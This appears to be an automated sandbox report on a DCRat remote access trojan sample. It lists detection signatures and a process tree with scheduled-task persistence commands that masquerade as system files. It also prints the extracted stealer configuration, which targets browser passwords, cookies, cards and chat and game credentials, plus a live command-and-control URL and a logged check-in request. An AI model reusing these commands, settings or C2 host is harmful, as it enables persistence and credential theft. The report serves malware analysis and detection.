Edit tour

Windows Analysis Report
hK8z1AmKO1.exe

Overview

General Information

Sample name:	hK8z1AmKO1.exe renamed because original name is a hash value
Original sample name:	69479795019aa359d016e695415f1736.exe
Analysis ID:	1581785
MD5:	69479795019aa359d016e695415f1736
SHA1:	8198ac724602eaa37905f15edba150658fd8bf5a
SHA256:	3529cf36c8b41b4d5ef281bc32cd211152e573d6639dc15399ee69a4ff0c0fd9
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates processes via WMI

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: System File Execution Location Anomaly

Sigma detected: WScript or CScript Dropper

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

hK8z1AmKO1.exe (PID: 6656 cmdline: "C:\Users\user\Desktop\hK8z1AmKO1.exe" MD5: 69479795019AA359D016E695415F1736)

wscript.exe (PID: 6752 cmdline: "C:\Windows\System32\WScript.exe" "C:\PortsavesPerfdhcpsvc\jTMUiy4UT3fzJ0p29vviWqbG.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 6940 cmdline: C:\Windows\system32\cmd.exe /c ""C:\PortsavesPerfdhcpsvc\oSG0DtwH58jESdPiWbQWqH7Kb5.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

providerwebmonitor.exe (PID: 7112 cmdline: "C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe" MD5: 887AFE3CFC62D5BBF0F08374A9EA7CCE)

schtasks.exe (PID: 4544 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 13 /tr "'C:\PortsavesPerfdhcpsvc\upfc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4464 cmdline: schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\PortsavesPerfdhcpsvc\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1732 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\PortsavesPerfdhcpsvc\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1364 cmdline: schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 10 /tr "'C:\PortsavesPerfdhcpsvc\UserOOBEBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1460 cmdline: schtasks.exe /create /tn "UserOOBEBroker" /sc ONLOGON /tr "'C:\PortsavesPerfdhcpsvc\UserOOBEBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2180 cmdline: schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 8 /tr "'C:\PortsavesPerfdhcpsvc\UserOOBEBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2084 cmdline: schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Recovery\sihost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3636 cmdline: schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Recovery\sihost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7012 cmdline: schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Recovery\sihost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3652 cmdline: schtasks.exe /create /tn "aVgRtcWKvuiHvUKTYwWvDjIqa" /sc MINUTE /mo 13 /tr "'C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5932 cmdline: schtasks.exe /create /tn "aVgRtcWKvuiHvUKTYwWvDjIq" /sc ONLOGON /tr "'C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6400 cmdline: schtasks.exe /create /tn "aVgRtcWKvuiHvUKTYwWvDjIqa" /sc MINUTE /mo 12 /tr "'C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 1420 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sSMyRm55ZX.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

w32tm.exe (PID: 5480 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

sihost.exe (PID: 7364 cmdline: "C:\Recovery\sihost.exe" MD5: 887AFE3CFC62D5BBF0F08374A9EA7CCE)

aVgRtcWKvuiHvUKTYwWvDjIq.exe (PID: 6660 cmdline: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe MD5: 887AFE3CFC62D5BBF0F08374A9EA7CCE)

wscript.exe (PID: 7260 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\57b77989-b658-46d2-a5dc-3af9328f5068.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

wscript.exe (PID: 7292 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ef498993-b965-4ad4-8c4b-72d20f78a4db.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

aVgRtcWKvuiHvUKTYwWvDjIq.exe (PID: 6656 cmdline: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe MD5: 887AFE3CFC62D5BBF0F08374A9EA7CCE)

sihost.exe (PID: 6852 cmdline: C:\Recovery\sihost.exe MD5: 887AFE3CFC62D5BBF0F08374A9EA7CCE)

sihost.exe (PID: 7024 cmdline: C:\Recovery\sihost.exe MD5: 887AFE3CFC62D5BBF0F08374A9EA7CCE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"I\":\"%\",\"M\":\"<\",\"i\":\"(\",\"A\":\"^\",\"0\":\"-\",\"d\":\"&\",\"n\":\"`\",\"N\":\"|\",\"U\":\")\",\"Q\":\".\",\"L\":\"$\",\"m\":\"~\",\"y\":\";\",\"V\":\",\",\"4\":\">\",\"Y\":\"*\",\"c\":\"#\",\"E\":\"!\",\"k\":\"@\",\"v\":\" \",\"H\":\"_\"}", "PCRT": "{\"4\":\"_\",\"t\":\"!\",\"l\":\"(\",\"D\":\"^\",\"Q\":\"-\",\"R\":\"@\",\"p\":\"&\",\"B\":\"#\",\"0\":\"~\",\"2\":\";\",\"Z\":\" \",\"F\":\".\",\"S\":\"%\",\"a\":\"|\",\"M\":\">\",\"C\":\",\",\"1\":\"*\",\"J\":\"$\",\"d\":\"`\",\"V\":\"<\",\"U\":\")\"}", "TAG": "", "MUTEX": "DCR_MUTEX-jGtPBHMnXl268JgwNhbx", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": false, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://ce58027.tw1.ru/@=MDNwQWMlZGN", "H2": "http://ce58027.tw1.ru/@=MDNwQWMlZGN", "T": "0"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000014.00000002.2908319735.00000000035E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000014.00000002.2908319735.00000000033DD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000014.00000002.2908319735.00000000033A2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.1821575874.0000000002E31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000004.00000002.1711103397.0000000002888000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001E.00000002.1843916510.0000000003201000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000014.00000002.2908319735.0000000003091000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000004.00000002.1711103397.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000017.00000002.1821403344.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000014.00000002.2908319735.00000000032E6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000016.00000002.1814111144.0000000002641000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000004.00000002.1711696699.00000000125AF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: providerwebmonitor.exe PID: 7112	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: aVgRtcWKvuiHvUKTYwWvDjIq.exe PID: 6660	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
Process Memory Space: aVgRtcWKvuiHvUKTYwWvDjIq.exe PID: 6660	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: aVgRtcWKvuiHvUKTYwWvDjIq.exe PID: 6656	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: sihost.exe PID: 6852	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: sihost.exe PID: 7024	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: sihost.exe PID: 7364	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 14 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe, ProcessId: 7112, TargetFilename: C:\Recovery\sihost.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\57b77989-b658-46d2-a5dc-3af9328f5068.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\57b77989-b658-46d2-a5dc-3af9328f5068.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe, ParentImage: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe, ParentProcessId: 6660, ParentProcessName: aVgRtcWKvuiHvUKTYwWvDjIq.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\57b77989-b658-46d2-a5dc-3af9328f5068.vbs" , ProcessId: 7260, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\57b77989-b658-46d2-a5dc-3af9328f5068.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\57b77989-b658-46d2-a5dc-3af9328f5068.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe, ParentImage: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe, ParentProcessId: 6660, ParentProcessName: aVgRtcWKvuiHvUKTYwWvDjIq.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\57b77989-b658-46d2-a5dc-3af9328f5068.vbs" , ProcessId: 7260, ProcessName: wscript.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Recovery\sihost.exe, CommandLine: C:\Recovery\sihost.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\sihost.exe, NewProcessName: C:\Recovery\sihost.exe, OriginalFileName: C:\Recovery\sihost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Recovery\sihost.exe, ProcessId: 6852, ProcessName: sihost.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\57b77989-b658-46d2-a5dc-3af9328f5068.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\57b77989-b658-46d2-a5dc-3af9328f5068.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe, ParentImage: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe, ParentProcessId: 6660, ParentProcessName: aVgRtcWKvuiHvUKTYwWvDjIq.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\57b77989-b658-46d2-a5dc-3af9328f5068.vbs" , ProcessId: 7260, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\PortsavesPerfdhcpsvc\jTMUiy4UT3fzJ0p29vviWqbG.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\PortsavesPerfdhcpsvc\jTMUiy4UT3fzJ0p29vviWqbG.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\hK8z1AmKO1.exe", ParentImage: C:\Users\user\Desktop\hK8z1AmKO1.exe, ParentProcessId: 6656, ParentProcessName: hK8z1AmKO1.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\PortsavesPerfdhcpsvc\jTMUiy4UT3fzJ0p29vviWqbG.vbe" , ProcessId: 6752, ProcessName: wscript.exe

Suricata Signatures

ET MALWARE DCRAT Activity (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T00:07:08.224516+0100	2034194	1	A Network Trojan was detected	192.168.2.4	49730	185.114.245.123	80	TCP

ETPRO MALWARE DCRat Initial Checkin Server Response M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T00:07:48.386545+0100	2850862	1	Malware Command and Control Activity Detected	185.114.245.123	80	192.168.2.4	49744	TCP
2024-12-29T00:08:53.761531+0100	2850862	1	Malware Command and Control Activity Detected	185.114.245.123	80	192.168.2.4	49860	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: hK8z1AmKO1.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Recovery\sihost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\sSMyRm55ZX.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\PortsavesPerfdhcpsvc\upfc.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\PortsavesPerfdhcpsvc\jTMUiy4UT3fzJ0p29vviWqbG.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\PortsavesPerfdhcpsvc\UserOOBEBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\ef498993-b965-4ad4-8c4b-72d20f78a4db.vbs	Avira: detection malicious, Label: VBS/Starter.VPVT
Source: C:\Users\user\AppData\Local\Temp\57b77989-b658-46d2-a5dc-3af9328f5068.vbs	Avira: detection malicious, Label: VBS/Runner.VPXJ
Source: C:\Users\user\AppData\Local\Temp\3eb93d73da02516de53e5ed168763ffb45d30163.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984

Found malware configuration

Source: 00000004.00000002.1711696699.00000000125AF000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"SCRT": "{\"I\":\"%\",\"M\":\"<\",\"i\":\"(\",\"A\":\"^\",\"0\":\"-\",\"d\":\"&\",\"n\":\"`\",\"N\":\"|\",\"U\":\")\",\"Q\":\".\",\"L\":\"$\",\"m\":\"~\",\"y\":\";\",\"V\":\",\",\"4\":\">\",\"Y\":\"*\",\"c\":\"#\",\"E\":\"!\",\"k\":\"@\",\"v\":\" \",\"H\":\"_\"}", "PCRT": "{\"4\":\"_\",\"t\":\"!\",\"l\":\"(\",\"D\":\"^\",\"Q\":\"-\",\"R\":\"@\",\"p\":\"&\",\"B\":\"#\",\"0\":\"~\",\"2\":\";\",\"Z\":\" \",\"F\":\".\",\"S\":\"%\",\"a\":\"|\",\"M\":\">\",\"C\":\",\",\"1\":\"*\",\"J\":\"$\",\"d\":\"`\",\"V\":\"<\",\"U\":\")\"}", "TAG": "", "MUTEX": "DCR_MUTEX-jGtPBHMnXl268JgwNhbx", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": false, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://ce58027.tw1.ru/@=MDNwQWMlZGN", "H2": "http://ce58027.tw1.ru/@=MDNwQWMlZGN", "T": "0"}

Multi AV Scanner detection for dropped file

Source: C:\PortsavesPerfdhcpsvc\UserOOBEBroker.exe	ReversingLabs: Detection: 78%
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	ReversingLabs: Detection: 78%
Source: C:\PortsavesPerfdhcpsvc\upfc.exe	ReversingLabs: Detection: 78%
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	ReversingLabs: Detection: 78%
Source: C:\Recovery\sihost.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\3eb93d73da02516de53e5ed168763ffb45d30163.exe	ReversingLabs: Detection: 78%

Multi AV Scanner detection for submitted file

Source: hK8z1AmKO1.exe

ReversingLabs: Detection: 70%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Joe Sandbox ML: detected
Source: C:\Recovery\sihost.exe	Joe Sandbox ML: detected
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Joe Sandbox ML: detected
Source: C:\PortsavesPerfdhcpsvc\upfc.exe	Joe Sandbox ML: detected
Source: C:\PortsavesPerfdhcpsvc\UserOOBEBroker.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3eb93d73da02516de53e5ed168763ffb45d30163.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: hK8z1AmKO1.exe

Joe Sandbox ML: detected

Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA77E31 CryptUnprotectData,	20_2_00007FFD9BA77E31
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA77E7E CryptUnprotectData,	20_2_00007FFD9BA77E7E
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA77E6F CryptUnprotectData,	20_2_00007FFD9BA77E6F

Source: hK8z1AmKO1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: hK8z1AmKO1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: hK8z1AmKO1.exe
Source:	Binary string: kC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003132000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2932176287.000000001CE68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003616000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: eC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003132000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003616000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003132000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003132000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B7A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_00B7A5F4
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B8B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_00B8B8E0

Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49730 -> 185.114.245.123:80
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 185.114.245.123:80 -> 192.168.2.4:49744
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 185.114.245.123:80 -> 192.168.2.4:49860

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://ce58027.tw1.ru/@=MDNwQWMlZGN

Source: Joe Sandbox View

ASN Name: TIMEWEB-ASRU TIMEWEB-ASRU

Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?sfxSMm=rxb3wPgb0HPV&2e6ea3aaeac867bc064a534e31e365d4=6f9cfd298d9789ebd2787a0e63b0d086&0f0872650c0ba62ba5efb31d4a3a3070=QNkVjYlNmNihDZkJjM3IWO5QDZ4Y2NiV2NxIDOzYmYyEWNzYGMlRjM&sfxSMm=rxb3wPgb0HPV HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ruConnection: Keep-Alive
